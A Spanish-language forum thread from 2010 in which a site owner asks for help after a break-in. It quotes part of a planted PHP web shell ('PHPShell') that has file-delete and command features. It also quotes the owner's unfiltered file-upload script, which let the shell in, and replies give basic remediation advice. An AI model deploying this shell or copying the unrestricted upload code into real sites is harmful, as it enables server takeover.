se bajaron mi web ... ayuda

mtubillas · #1 (**permalink**) 13/07/2010, 14:14

Hola amigos .. hoy hackearon mi web un tal F3L0M4N, he encontrado en el host un archivo llamado 26.php el cual tiene el siguiente codigo:

Código PHP:

Ver original<?php 
 
 
 
$SFileName=$PHP_SELF;               /*I added this to ensure the script will run correctly...
                                    Please enter the Script's filename in this variable.*
 
                    /* uncomment the two following variables if you want to use http
                       authentication. This will password protect your PHPShell */
 
function walkArray($array){
  while (list($key, $data) = each($array)) {
    if (is_array($data)) {
      walkArray($data);
    }
    else {
      global $$key;
      $$key = $data;
    }
  }
}
if (isset($_PUT)) walkArray($_PUT);
if (isset($_GET)) walkArray($_GET);
if (isset($_POST)) walkArray($_POST);
 
error_reporting(0);
$PHPVer=phpversion();
$isGoodver=(intval($PHPVer[0])>=4);
$scriptTitle = "PHPShell";
$scriptident = "$scriptTitle by Macker";
 
if (empty($Pmax))
    $Pmax = 50;   /* Identifies the max amount of Directories and files listed on one page */
if (empty($Pidx)) 
    $Pidx = 0;
 
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
 
$scriptdate = "30 march 2003";
$scriptver = "Version 2.6.3dev";
$LOCAL_IMAGE_DIR = "img";
$REMOTE_IMAGE_URL = "img";
$img = array(
                "Edit"      => "edit.JPG",
                "Download"  => "download.JPG",
                "Upload"    => "upload.JPG",
                "Delete"    => "delete.JPG",
                "View"      => "view.JPG",
                "Rename"    => "rename.JPG",
                "Move"      => "move.JPG",
                "Copy"      => "copy.JPG",
                "Execute"   => "exec.JPG"
            );
 
while (list($id, $im)=each($img))
    if (file_exists("$LOCAL_IMAGE_DIR/$im"))
        $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
    else
        $img[$id] = "[$id]";
 
 
/* HTTP AUTHENTICATION */
 
    if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || md5($PHP_AUTH_PW) != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
        setcookie("noauth","");
        Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
        Header( "HTTP/1.0  401  Unauthorized");
        echo "Your username or password is incorrect";
        echo "\n\n" . md5($PHP_AUTH_PW);
 
        exit ;
                 
    } 
 
function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
 
function Mydeldir($Fdir) {
    if (is_dir($Fdir)) {
        $Fh=@opendir($Fdir);
        while ($Fbuf = readdir($Fh))
            if (($Fbuf != ".") && ($Fbuf != ".."))
                Mydeldir("$Fdir/$Fbuf");
        @closedir($Fh);
                return rmdir($Fdir);
    }   else {
        return unlink($Fdir);
    }
}
 
function formatsize($insize) {  
    $size = $insize;
    $add = "B";
    if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "KB";
    }
    if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "MB";
    }
    if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "GB";
    }
    if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "TB";
    }
    return "$size $add";
}
 
if ($cmd != "downl") {
    ?>
 
<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
<HTML>
 <HEAD>
  <STYLE>
  <!--
    A{ text-decoration:none; color:navy; font-size: 12px }
    body { font-size: 12px;
            background-image: url(img/repeat.bmp); 
            scrollbar-width: 5;
        scrollbar-face-color: silver;
        scrollbar-shadow-color: gray;
        scrollbar-highlight-color: white;
        scrollbar-3dlight-color:black;
        scrollbar-darkshadow-color: black;
        scrollbar-track-color:#dddddd;
        scrollbar-arrow-color: black;
    }
    Table { font-size: 12px; }
    TR{ font-size: 12px; }
    TD{ font-size: 12px; BORDER-LEFT: black 0px solid; BORDER-RIGHT: black 0px solid; BORDER-TOP: black 0px solid; BORDER-BOTTOM: black 0px solid; COLOR: black; }
    .border{       BORDER-LEFT: black 1px solid;
           BORDER-RIGHT: black 1px solid;
           BORDER-TOP: black 1px solid;
           BORDER-BOTTOM: black 1px solid;
         }
    .none  {       BORDER-LEFT: black 0px solid;
           BORDER-RIGHT: black 0px solid;
           BORDER-TOP: black 0px solid;
           BORDER-BOTTOM: black 0px solid;
         }
    .inputtext {
            background-color: #EFEFEF;
            border: 1px solid #000000;
            height: 20;
    }
    .inputbutton {
                        background-color: silver;
            border: 1px solid #000000;
            border-width: 1px;
            height: 20;
    }
    .white {
     background-color: #FFFFFF;
     }
    .inputtextarea {
            background-color: #EFEFEF;
            border: 1px solid #000000;
            scrollbar-width: 5;
            scrollbar-height: 5;
            scrollbar-face-color: #EFEFEF;
            scrollbar-shadow-color: silver;
            scrollbar-highlight-color: #EFEFEF;
            scrollbar-3dlight-color:silver;
            scrollbar-darkshadow-color: silver;
            scrollbar-track-color: #EFEFEF;
            scrollbar-arrow-color: black;
    }
    .top { BORDER-TOP: black 1px solid; }
    .textin { BORDER-LEFT: silver 1px solid;
              BORDER-RIGHT: silver 1px solid;
          BORDER-TOP: silver 1px solid;
              BORDER-BOTTOM: silver 1px solid;
              width: 99%; font-size: 12px; font-weight: bold; color: navy;
            }
    .notop { BORDER-TOP: black 0px solid; }
    .bottom { BORDER-BOTTOM: black 1px solid; }
    .nobottom { BORDER-BOTTOM: black 0px solid; }
    .left { BORDER-LEFT: black 1px solid; }
    .noleft { BORDER-LEFT: black 0px solid; }
    .right { BORDER-RIGHT: black 1px solid; }
    .noright { BORDER-RIGHT: black 0px solid; }
    .silver{ BACKGROUND: silver; }
  -->
  </STYLE>
  <TITLE><?php echo $SFileName ?></TITLE>
 </HEAD>
 <body bottommargin="0" rightmargin="0" topmargin="0" leftmargin="0">
 <table width=100% height="100%" NOWRAP border="0">
  <tr NOWRAP>
   <td width="100%" NOWRAP>
    <table NOWRAP width=100% height="100%" border="0" cellpadding="0" cellspacing="0">
     <tr>
      <td width="100%" height="15" class="silver border">
       <center>
        <strong>
         <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font>
            </strong>
       </center>
      </td>
     </tr>
     <tr><td valign="middle"><br>
 
    <?php
}
 
if ( $cmd=="dir" ) {
    $h=@opendir($dir);
    if ($h == false) {
        echo "<br><font color=\"red\">&nbsp;&nbsp;&nbsp;\n\n\n\n
                COULD NOT OPEN THIS DIRECTORY!!!<br>&nbsp;&nbsp;&nbsp;\n
                THE SCRIPT WILL RESULT IN AN ERROR!!!
                <br><br>&nbsp;&nbsp;&nbsp;\n
                PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
                <br><br></font>\n\n\n\n";
    }
        if (function_exists('realpath')) {
        $partdir = realpath($dir);
    }
        else {
        $partdir = $dir;
    }
    if (strlen($partdir) >= 100) {
        $partdir = substr($partdir, -100);
        $pos = strpos($partdir, "/");
        if (strval($pos) != "") {
            $partdir = "<--   ...".substr($partdir, $pos);
        }
        $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
        $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
    $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
    }
    ?>

No se si el hacker tuvo accedo via FTP o como hizo para dejar ese archivo en el Host,

mi host es de godaddy,

desde ya muchas gracias por als sugerencias

maycolalvarez · #2 (**permalink**) 13/07/2010, 14:19

Wow!, le di un vistazo y creo que básicamente recoge mucha información sobre el sitio, además de poder intentar ejecutar aplicaciones, borralo inmediatamente.

Cambia la clave del FTP!!!!

intenta ver si tus uploads no están filtrando adecuadamente

mtubillas · #3 (**permalink**) 13/07/2010, 14:23

hola maycolalvarez,

muchas gracias por responderme,

ya elimine ese archivo, sabes .. el dia de ayer lo encontre y lo elimine, pero al amanecer el dia de hoy luego de cambiar la clave ftp lo volvi a encontrar en el host ???

con estas 2 hackeadas a mi sitio podria descartar que el acceso es FTP ???

desde ya muchas gracias

tokiodata · #4 (**permalink**) 13/07/2010, 14:45

mtubillas pasame tu url de tu web si quieres en privado pa chekr

mtubillas · #5 (**permalink**) 13/07/2010, 15:03

hola tokiodata,

crees q tew pueda pasar el contenido del php para analizarlo ???

gracias por todo

Adell · #6 (**permalink**) 14/07/2010, 05:44

interesante script, el tema es que no solo por ftp te pueden subir un archivo, sino si tienes un upload mal filtrado seria lo mas comun, cual es la url del site?

mtubillas · #7 (**permalink**) 14/07/2010, 09:33

si tienes mucha razon amigo, el tema fue por un upload mal filtrado,

gracias por la ayuda

mtubillas · #8 (**permalink**) 14/07/2010, 09:34

alguien podria ayudarme a analizar todo el contenido de ese archivo, xfavor .. solo una parte esta en el primer comment ..

abimaelrc · #9 (**permalink**) 14/07/2010, 09:40

Te recomiendo (de esta forma aprenderás bastante como trabajar con PHP), que vayas al manual de PHP y veas para que es útil la función que usen.

mtubillas · #10 (**permalink**) 14/07/2010, 09:59

gracias por la recomencación ...

johhan16 · #11 (**permalink**) 14/07/2010, 10:29

podrias mostrar el codigo que tenias del upload mal filtrado para uno prevenir

mtubillas · #12 (**permalink**) 14/07/2010, 16:06

Código PHP:

Ver original<form method="POST" name="flocales" id="flocales" action="guarda.php" onSubmit="return validar(this)" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="500000000">
<input name="uploadfile" type="file" size=40>
<input type="submit"  value="  Publicar  " class="inputfile2" name="B1" style="font-family: Arial; font-size: 8pt; font-weight:bold">
</form>

Código PHP:

Ver original<?PHP
$quarter  = $_POST['quarter'];
$year     = $_POST['year'];
$uploaddir = $_SERVER['DOCUMENT_ROOT'].'/imagenes/';
//$uploaddir = '/tmp/';
 
echo (file_exists($uploaddir) && is_dir($uploaddir)) ? 'Directorio existente' : 'No existe el directorio';
 
     if (is_uploaded_file($_FILES['uploadfile']['tmp_name'])) {
          $name = $_FILES['uploadfile']['name'];
          $uploaddir = $uploaddir . $name;
          $tempname = $_FILES['uploadfile']['tmp_name'];
 
          $result = move_uploaded_file($_FILES['uploadfile']['tmp_name'],$uploaddir);
 
          if ($result == 1){ echo "<p  align='center'>Foto subida correctamente.</p>";}
               else { die("Error al subir la foto.  por favor pongase en contacto con el administrador");
               }
}
 
?>

la solución seria que el upload solo cargue iamgenes o los tipos de archivos que necesitamos, este upload carga de todo actualmente, saludos